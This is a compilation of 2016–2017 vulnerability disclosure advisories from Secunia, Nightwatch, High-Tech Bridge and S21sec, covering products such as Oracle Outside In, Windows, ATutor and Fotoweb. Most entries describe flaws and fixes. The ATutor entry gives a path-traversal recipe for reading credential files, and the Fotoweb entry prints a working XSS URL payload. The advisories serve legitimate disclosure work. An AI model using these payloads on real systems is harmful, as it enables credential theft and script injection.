acknowledge the vulnerability and publish a suggested fix in an unofficial source code repository. 2017/01/19 - Maintainers informed about the fixed released date of Secunia Advisory set to 2017/01/23 due to the public disclosure of the vulnerability. 2017/01/19 - Maintainers provide a patch in the official source code repository. 2017/01/23 - Release of Secunia Advisory SA74169. 2017/01/27 - Public disclosure of Secunia Research Advisory. 2017/01/30 - Added CVE identifier. == 6) Credits Discovered by Jakub Jirasek, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2017-5601 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup
Secunia Research: Oracle Outside In VSDX Use-After-Free Vulnerability
== Secunia Research 2016/01/18 Oracle Outside In VSDX Use-After-Free Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3. == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a use-after-free error within the vsvsdx.dll when processing PageHeight and PageWidth values of VSDX file, which can be exploited to corrupt memory via a specially crafted VSDX file. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in version 8.5.3. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2203916.1 == 5) Time Table 2016/08/30 - Vendor notified about vulnerability. 2016/08/31 - Vendor supplied bug ticket ID. 2016/10/25 - Vendor supplies information of fix in main codeline. 2017/01/16 - Requested CVE information from the vendor. 2017/01/17 - Release of vendor patch. 2017/01/18 - Vendor responds with CVE identifiers. 2017/01/18 - Release of Secunia Advisory SA73777. 2017/01/18 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera Software == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2017-3266 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2017-1/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Windows Type 1 Font Processing Vulnerability
== Secunia Research 2016/12/14 Microsoft Windows Type 1 Font Processing Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 10 * Microsoft Windows 7 * Microsoft Windows 8.1 * Microsoft Windows RT 8.1 * Microsoft Windows Server 2008 * Microsoft Windows Server 2012 * Microsoft Windows Server 2016 * Microsoft Windows Vista == 2) Severity Rating: Moderately critical Impact: Privilege escalation, Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the win32k.sys when processing Type 1 fonts, which can be exploited to trigger a NULL pointer dereference and subsequently cause a kernel crash or gain elevated privileges via a specially crafted PFB font. The vulnerability is confirmed on a fully patched Windows 7 Professional (win32k.sys version 6.1.7601.23545). == 4) Solution Apply update. https://technet.microsoft.com/library/security/MS16-151 == 5) Time Table 2016/12/01 - Vendor notified about vulnerability. 2016/12/06 - Vendor response. 2016/12/13 - Release of Secunia Advisory SA73777. 2016/12/14 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera Software == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2016-7259 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2016-19/ Complete list of vulnerability reports published by Secunia Research: http
Secunia Research: Microsoft Windows OTF Parsing Table Encoding Record Offset Vulnerability
== Secunia Research 2016/11/10 Microsoft Windows OTF Parsing Table Encoding Record Offset Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 10 * Microsoft Windows 7 * Microsoft Windows 8.1 * Microsoft Windows RT 8.1 * Microsoft Windows Server 2008 * Microsoft Windows Server 2012 * Microsoft Windows Server 2016 * Microsoft Windows Vista == 2) Severity Rating: Moderately critical Impact: Exposure of sensitive information or Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to disclose potentially sensitive information or cause a DoS (Denial of Service). The vulnerability is caused due to an integer overflow error when processing CMAP table within Open Type Font (OTF) files and can be exploited to cause a kernel crash or disclose kernel memory via a specially crafted table encoding record offset within a OTF file. == 4) Solution Apply update. https://technet.microsoft.com/library/security/MS16-132 == 5) Time Table 2016/07/06 - Vendor notified about vulnerability. 2016/07/07 - Vendor response. 2016/07/20 - Vendor status update. 2016/11/08 - Release of vendor patch. 2016/11/08 - Release of Secunia Advisory SA69996. 2016/11/10 - Public disclosure of Secunia Research Advisory. == 6) Credits Discovered by Hossein Lotfi, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2016-7210 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2016-16/ Complete list of vulnerability reports published by Secunia
Secunia Research: Oracle Outside In "GetTxObj()" Use-After-Free Vulnerability
== Secunia Research 2016/11/10 Oracle Outside In "GetTxObj()" Use-After-Free Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3. == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a use-after-free error within the "GetTxObj()" function (vsflw.dll), which can be exploited to corrupt memory via a specially crafted PRZ file. Successful exploitation may allow execution of arbitrary code. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2171485.1 == 5) Time Table 2016/06/09 - Vendor notified about a vulnerability when processing PRZ files. 2016/06/09 - Vendor response. 2016/06/10 - Vendor supplied bug ticket ID. 2016/06/26 - Vendor supplies information of fix in main codeline. 2016/06/28 - Vendor requests to reschedule public disclosure of the vulnerability. 2016/06/29 - Contacted the vendor with a new public disclosure date. 2016/10/18 - Release of vendor patch. 2016/10/19 - Release of Secunia Advisory SA65000. 2016/10/19 - Requested CVE information from the vendor. 2016/10/31 - Vendor responds with CVE identifiers 2016/11/10 - Public disclosure of Secunia Research Advisory. == 6) Credits Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2016-5574 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website
Secunia Research: Oracle Outside In "VwStreamRead()" Buffer Overflow Vulnerability
== Secunia Research 2016/11/10 Oracle Outside In "VwStreamRead()" Buffer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3. == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the "VwStreamRead()" function (vssdw.dll), which can be exploited to cause a heap-based buffer overflow via a specially crafted SDW file. Successful exploitation may allow execution of arbitrary code. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2171485.1 == 5) Time Table 2016/05/26 - Vendor notified about a vulnerability when processing SDW files. 2016/05/26 - Vendor response. 2016/05/27 - Vendor supplies bug ticket ID. 2016/06/26 - Vendor supplies information of fix in main codeline. 2016/06/28 - Vendor requests to reschedule public disclosure of the vulnerability. 2016/06/29 - Contacted the vendor with a new public disclosure date. 2016/10/18 - Release of vendor patch. 2016/10/19 - Release of Secunia Advisory SA65000. 2016/10/19 - Requested CVE information from the vendor. 2016/10/31 - Vendor responds with CVE identifiers 2016/11/10 - Public disclosure of Secunia Research Advisory. == 6) Credits Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2016-5558 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiti
Crashing Android devices with large Assisted-GPS Data Files [CVE-2016-5348]
Original at: https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/ Summary Android devices can be crashed remotely forcing a halt and then a soft reboot by a MITM attacker manipulating assisted GPS/GNSS data provided by Qualcomm. This issue affects the open source code in AOSP and proprietary code in a Java XTRA downloader provided by Qualcomm. The Android issue was fixed by in the October 2016 Android bulletin. Additional patches have been issued by Qualcomm to the proprietary client in September of 2016. This issue may also affect other platforms that use Qualcomm GPS chipsets and consume these files but that has not been tested by us, and requires further research. Background – GPS and gpsOneXtra Most mobile devices today include ability to locate themselves on the Earth’s surface by using the Global Positioning System (GPS), a system originally developed and currently maintained by the US military. Similar systems developed and maintained by other countries exist as well including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou. The GPS signals include an almanac which lists orbit and status information for each of the satellites in the GPS constellation. This allows the receivers to acquire the satellites quicker since the receiver would not need to search blindly for the location of each satellite. Similar functionality exists for other GNSS systems. In order to solve the problem of almanac acquisition, Qualcomm developed the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance since 2013). This system provides ability to GPS receivers to download the almanac data over the Internet from Qualcomm-operated servers. The format of these XTRA files is proprietary but seems to contain current satellite location data plus estimated locations for the next 7 days, as well as additional information to improve signal acquisition. Most Qualcomm mobile chipsets and GPS chips include support for this technology. A related Qualcomm technology called IZat adds ability to use WiFi and cellular networks for locations in addition to GPS. Background – Android and gpsOneXtra Data Files During our network monitoring of traffic originating from an Android test device, we discovered that the device makes periodic calls to the Qualcomm servers to retrieve gpsOneXtra assistance files. These requests were performed almost every time the device connected to a WiFi network. As discovered by our research and confirmed by the Android source code, the following URLs were used: http://xtra1.gpsonextra.net/xtra.bin http://xtra2.gpsonextra.net/xtra.bin http://xtra3.gpsonextra.net/xtra.bin http://xtrapath1.izatcloud.net/xtra2.bin http://xtrapath2.izatcloud.net/xtra2.bin http://xtrapath3.izatcloud.net/xtra2.bin WHOIS record show that both domains – gpsonextra.net and izatcloud.net are owned by Qualcomm. Further inspection of those URLs indicate that both domains are being hosted and served from Amazon’s Cloudfront CDN service (with the exception of xtra1.gpsonextra.net which is being served directly by Qualcomm). On the Android platform, our inspection of the Android source code shows that the file is requested by an OS-level Java process (GpsXtraDownloader.java), which passes the data to a C++ JNI class (com_android_server_location_GnssLocationProvider.cpp), which then injects the files into the Qualcomm modem or firmware. We have not inspected other platforms in detail, but suspect that a similar process is used. Our testing was performed on Android v6.0, patch level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and confirmed on a Nexus 6P running Android v6.01, with May 2016 security patches. Qualcomm has additionally performed testing on their proprietary Java XTRA downloader client confirming this vulnerability. Vulnerability Details Android platform downloads XTRA data files automatically when connecting to a new network. This originates from a Java class (GpsXtraDownloader.java), which then passes the file to a C++/JNI class (com_android_server_location_GnssLocationProvider.cpp) and then injects it into the Qualcomm modem. The vulnerability is that both the Java and the C++ code do not check how large the data file actually is. If a file is served that is larger than the memory available on the device, this results in all memory being exhausted and the phone halting and then soft rebooting. The soft reboot was sufficient to recover from the crash and no data was lost. While we have not been able to achieve remote code execution in either the Qualcomm modem or in the Android OS, this code path can potentially be exploited for such attacks and would require more research. To attack, an MITM attacker located anywhere on the network between the phone being attacked and Qualcomm’s servers can initiate this attack by intercepting the legitimate requests from the phone, and substituting their own, larger files. Because the default Chrome browser on Android reveals
Insecure transmission of data in Android applications developed with Adobe AIR [CVE-2016-6936]
Original at: https://wwws.nightwatchcybersecurity.com/2016/09/14/advisory-insecure-transmission-of-data-in-android-applications-developed-with-adobe-air-cve-2016-6936/ Summary Android applications developed with Adobe AIR send data back to Adobe servers without HTTPS while running. This can allow an attacker to compromise the privacy of the applications users. This has been fixed in Adobe AIR SDK release v23.0.0.257. Details Adobe AIR is a developer product which allows the same application code to be compiled and run across multiple desktop and mobile platforms. While monitoring network traffic during testing of several Android applications we observed network traffic over HTTP without the use of SSL going to several Adobe servers including the following: - airdownload2.adobe.com - mobiledl.adobe.com Because encryption is not used, this would allow a network-level attacker to observe the traffic and compromise the privacy of the applications users. This affects applications compiled with the Adobe AIR SDK versions 22.0.0.153 and earlier. Vendor Response Adobe has released a fix for this issue on September 13th, 2016 in Adobe AIR SDK v23.0.0.257. Developers should update and rebuild their application using the latest SDK. References Adobe Security Bulletin: ASPB16-31 CVE: CVE-2016-6936 Timeline 2016-06-15: Report submitted to Adobes HackerOne program 2016-06-16: Report out of scope for this program, directed to Adobes PSIRT 2016-06-16: Submitted via email to Adobes PSIRT 2016-06-17: Reply received from PSIRT and a ticket number is assigned 2016-09-09: Response received from the vendor that the fix will be released next week 2016-09-13: Fix released 2016-09-14: Public disclosure
Secunia Research: LibGD "_gdContributionsAlloc()" Integer Overflow Denial of Service Vulnerability
== Secunia Research 03/08/2016 LibGD "_gdContributionsAlloc()" Integer Overflow Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * LibGD version 2.2.2. Prior versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered a vulnerability in LibGD, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an integer overflow error within the "_gdContributionsAlloc()" function (gd_interpolation.c) and can be exploited to cause an out-of-bounds memory write access or exhaust available memory. == 4) Solution Update to version 2.2.3. == 5) Time Table 03/07/2016 - Initial contact with vendor. 03/07/2016 - Vendor responds and confirms the issue and sends a patch. 07/07/2016 - Replied to the vendor the patch is incomplete. 13/07/2016 - CVE requested from Mitre. 13/07/2016 - Mitre assigns CVE-2016-6207 for the issue. 19/07/2016 - Vendor patches the issue in the source code repository. 19/07/2016 - Release of Secunia Advisory SA71416 22/07/2016 - Vendor releases fixed version 2.2.3. 03/08/2016 - Public disclosure of Research Advisory. == 6) Credits Discovered by Kasper Leigh Haabb, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2016-6207 identifier for the vulnerability. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2016-9/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Arbitrary File Content Disclosure in Atutor
Advisory ID: HTB23297 Product: Atutor Vendor: Atutor Vulnerable Version(s): 2.2.1 and probably prior Tested Version: 2.2.1 Advisory Publication: February 24, 2016 [without technical details] Vendor Notification: February 24, 2016 Vendor Patch: July 1, 2016 Public Disclosure: August 2, 2016 Vulnerability Type: Path Traversal [CWE-22] Risk Level: Medium CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered path traversal vulnerability in a popular web-based e-learning system Atutor. A remote attacker can view contents of arbitrary local files on the target system with privileges of the web server. The vulnerability may allow an attacker gain access to potentially sensitive web application and system information, and use received data to gain complete control over vulnerable web application. Successful exploitation of vulnerability requires that user is registered and authenticated, but registration is open by default. The vulnerability exists due to absence of filtration of user-supplied data passed via "icon" HTTP POST to "/mods/_core/courses/users/create_course.php" script, when saving information to database. A remote authenticated attacker can use directory traversal sequences (e.g. "../") in user's icon parameter to overwrite its value and then include arbitrary file on the system and view its contents. The following PoC code can be used to replace path to user’s icon in database. In this example, we will inject path to the system configuration "/include/config.inc.php" file: http://[host]/mods/_core/courses/users/create_course.php; method="POST" name="f1" enctype="multipart/form-data"> The injected parameter is used in "readfile()" function in the "/get_course_icon.php" script. To view contents of the "/include/config.inc.php" file and see database credentials, the attacker needs to open the following URL: http:///get_course_icon.php?id=[COURSE_ID] --- Solution: Update to ATutor 2.2.2 More Information: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2 --- References: [1] High-Tech Bridge Advisory HTB23297 - https://www.htbridge.com/advisory/HTB23297 - Arbitrary File Content Disclosure in Atutor [2] Atutor - http://www.atutor.ca/ - ATutor is a FREE Open Source LMS, used to develop online courses and create elearning content. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
[S21SEC-047] Fotoware Fotoweb 8.0 Cross Site Scripting
##
- S21Sec Advisory -
- S21SEC-047-en.txt -
##
Title: Fotoware Fotoweb 8.0 Cross Site Scripting (XSS)
ID: S21sec-047-en
Severity: Low
History: May.2016 Vulnerability discovered
June.2016 Vendor contacted
July.2016 Vendor patch acknowledge.
Scope: Cross Site Scripting XSS
Platforms: Any
Author: Miguel A. Hernandez / Departamento Auditoria S21sec.
Release: Public
[ SUMMARY ]
Fotoweb is an enterprise grade Digital Asset Management System (DMS).
A DMS provides a central repository of pictures and media files.
Unfiltered user-supplied data can lead a reflected XSS vulnerability.
This allows an attacker to execute arbitrary JavaScript in the context of the
browser of a victim if the victim clicks on an attacker supplied link or visits
an attacker controlled website.
[ AFFECTED VERSIONS ]
This vulnerability has been tested and found working on version 8.0.715.5753
[ DESCRIPTION ]
An insufficient input validation allows JS code injection in the
parameter 'to' in login page. Example:
http://fotowebserver/fotoweb/views/login?to=/fotoweb/%22;}%20else%20{%20alert%28%22S21sec%20XSS%22%29;%20}%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22
[ WORKAROUND ]
The reported vulnerability has been reviewed by Fotoware development team.
This issue is addressed in FotoWeb 8 Feature Release 8.
[ ACKNOWLEDGMENTS ]
This vulnerability has been found and researched by:
- Miguel A. Hernandez [ Departamento de Auditoria S21sec ]
We would like to acknowledge the assistance of Fotoware:
- John Fredrik Engeland [ Fotoware Support Manager ]
[ REFERENCES ]
* Fotoware
http://fotoware.com
* S21sec
http://www.s21sec.com
* S21sec Blog
http://blog.s21sec.com
Crashing Browsers Remotely via Insecure Search Suggestions
[Original here: https://wwws.nightwatchcybersecurity.com/2016/07/26/research-crashing-browsers-remotely-via-insecure-search-suggestions/] Summary Intercepting insecure search suggestion requests from browsers, and returning very large responses leads to browser crashes (but not RCE). Affected browsers areFireFox on the desktop and Android, and Chrome on desktop and Android other Chromium and FireFox derived browsers maybe affected. Internet Explorer andSafari are not affected. The issue is exploitable remotely, albeit not easily. Details Because browsers include multiple non-HTTPS search engines which also use non-HTTPS endpoints, it would be possible for an attacker on the network level to intercept the traffic flowing between the browser and the search engine endpoints, and substitute their own. If a very large response is returned (2+ GBs), the browser can run out of memory and crash. This is due to the fact that browsers do not check for sizes in the search suggestions responses. Obviously, this is more of an issue for mobile devices which have lower memory than desktops. For Android AOSP browser and Chromium, this issue appear to be directly tied to the processing code of search engine responses. For FireFox, this is a more generic issue around large XMLHTTPRequest responses, which is what the browser is using internally for search suggestions. Our bug reports with the vendors provide more details on which code is causing this. This re-enforces the fact network traffic SHOULD NEVER be trusted. The following crashes were observed we have not been able to cause an RCE or a buffer overflow: - Android AOSP stock browser on Android (v4.4) application crashes - Chrome v51 on Android (v6.01) application crashes - Chrome v51 on desktop Linux (Ubuntu v16.04) the entire computer freezes requires a reboot (this maybe to due to swapping being disabled with an SSD drive) - FireFox v47 on desktop Linux (Ubuntu v16.04) and Android (v6.01) application crashes Safari v9.1 and Internet Explorer 11 and Edge appear not to be affected, although a similar bug has happened before with Safari. We did not test prior versions of either Safari or IE. We also did not test any other browsers derived from Chromium or FireFox. The practical exploitation of this issue is mitigated by several factors: - The attacker must have control over DNS and the network traffic of the victim machine. This is most likely in cases of a rogue WiFi hotspot or a hacked router. - Most browsers have a rather short timeout for search engine suggestions response, not allowing sufficient time for the large response packet to be transferred over network - Due to the very large response size needed to trigger this issue, it is only exploitable over broadband or local networks such as rogue WiFi hotspot Vendor Responses Google response re: Android AOSP browser: "The team reviewed this issue and dont believe there is a security vulnerability here. It seems the worse things that can happen is the browser crashes due to resource exhaustion. The phone is still usable so there isnt a denial of service." Google response re: Chromium: "We dont consider DoS to be a security vulnerability. See the Chrome Security FAQ: https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs-; Mozilla / FireFox response has been to remove the security restriction on this bug, therefore indicating that this is not a security issue. References Android bug reports: 214784 and 214785 Chromium bug reports: 624779 and 624794 FireFox bug reports: 1283675 and 1283672 Timeline 2016-06-30: Bug filed with Android 2016-06-30: Bug filed with Chromium 2016-06-30: Bug filed Mozilla/FireFox 2016-06-30: Response from Chromium, Wont Fix 2016-07-12: Response from Android, not a security issue 2016-07-13: Android team is ok with disclosure 2016-07-14: Mozilla removes security restrictions on the bug 2016-07-26: Public disclosure
Secunia Research: Reprise License Manager "akey" Buffer Overflow Vulnerability
== Secunia Research 25/07/2016 Reprise License Manager "akey" Buffer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Reprise License Manager versions 12.0BL2, 12.1BL2, and 12.1BL3. Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System compromise Where: From local network == 3) Description of Vulnerabilities Secunia Research have discovered a vulnerability in Reprise License Manager (RLM), which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error when handling the "akey" POST parameter related to /goform/activate_doit, which can be exploited to cause a stack-based buffer overflow via a specially crafted HTTP request. Successful exploitation of the vulnerability may allow execution of arbitrary code. == 4) Solution No official solution is currently available. == 5) Time Table 01/06/2016 - Initial contact with vendor. 01/06/2016 - Vendor responds with service ticket ID. 02/06/2016 - Details transferred. 02/06/2016 - Vendor confirms reception and informs that the issues will be fixed in version 12.1. 28/06/2016 - Release of vendor patch. 30/06/2016 - Release of Secunia Advisory SA67000, which includes one of the vulnerabilities that is confirmed fixed. 01/07/2016 - Contacted the vendor that vulnerability #2 is still unpatched. An requested an ETA for a fixed release. 01/07/2016 - Vendor disagrees on the existence of the vulnerability due to the application never to be run with elevated privileges by design. 01/07/2016 - Replied to the vendor with detailed analysis of the issue and clarified that as the vulnerability is remotely exploitable, it is still exploitable even if the 